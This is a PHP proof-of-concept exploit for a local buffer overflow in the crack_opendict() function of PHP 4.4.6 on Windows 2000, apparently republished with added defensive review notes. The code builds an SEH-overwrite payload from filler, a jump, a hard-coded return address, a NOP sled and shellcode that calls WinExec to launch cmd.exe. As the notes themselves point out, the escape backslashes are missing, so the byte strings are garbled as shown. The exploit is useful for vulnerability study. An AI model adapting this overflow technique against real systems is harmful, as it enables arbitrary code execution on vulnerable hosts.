
php_446_crack_opendict_local_bof.txt

Posted on 09 March 2007

<?php
// PHP 4.4.6 crack_opendict() local buffer overflow poc exploit
// win2k sp3 version / seh overwrite method
// to be launched from the cli
// by rgod
// site: http://retrogod.altervista.org
//
// Review notes (defensive reading of this PoC):
// - The overflow is reached through the single argument of crack_opendict()
//   (the dictionary path); the oversized string built below is what triggers it.
//   Any code path that lets untrusted input reach that argument is exposed.
// - The hard-coded addresses (WinExec, ExitProcess, the "call ebx" return
//   address) are tied to the stated Windows/ntdll build; on other builds the
//   PoC is expected to be a crash rather than code execution.
// - Mitigation: never pass attacker-controlled data to crack_opendict(); the
//   crack extension is a PECL add-on that, to my knowledge, has not been
//   maintained for years, so removing it is the simplest fix — TODO confirm
//   the fixed PHP/extension version against the vendor advisory.
// - Observable on a host where the payload fires: php.exe spawning cmd.exe
//   (the payload string below is "cmd.exe /c start notepad & ").
// - As reproduced on this page the "\x" escapes have lost their backslashes
//   during extraction, so the quoted strings are plain ASCII text rather than
//   the intended byte values; the listing is informational, not runnable as-is.

if (!extension_loaded("crack")) {
    die("you need the crack extension loaded.");
}

// Payload: stager bytes followed by the ASCII command string handed to WinExec;
// ExitProcess is called afterwards so the interpreter terminates quietly.
$____scode =
    "xebx1b" .
    "x5b" .
    "x31xc0" .
    "x50" .
    "x31xc0" .
    "x88x43x59" .
    "x53" .
    "xbbxcax73xe9x77" . // WinExec
    "xffxd3" .
    "x31xc0" .
    "x50" .
    "xbbx5cxcfxe9x77" . // ExitProcess
    "xffxd3" .
    "xe8xe0xffxffxff" .
    "x63x6dx64" .
    "x2e" .
    "x65" .
    "x78x65" .
    "x20x2f" .
    "x63x20" .
    "start notepad & ";

$jmp = "xebx06x06xeb"; // jmp short (skips over the overwritten handler slot)
$eip = "x86xa0xf8x77"; // call ebx, ntdll.dll (build-specific address)

// NOTE(review): $____suntzu is appended to before being defined; PHP 4 only
// raises a notice for this, the result is the same as a plain assignment.
// 3216 bytes of filler presumably reach the SEH record on the stated build —
// unconfirmed here; the header comment ("seh overwrite method") is the only hint.
$____suntzu .= str_repeat("A", 3216);
$____suntzu .= $jmp . $eip . str_repeat("x90", 12) . $____scode;

crack_opendict($____suntzu);
?>
original url: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html

 
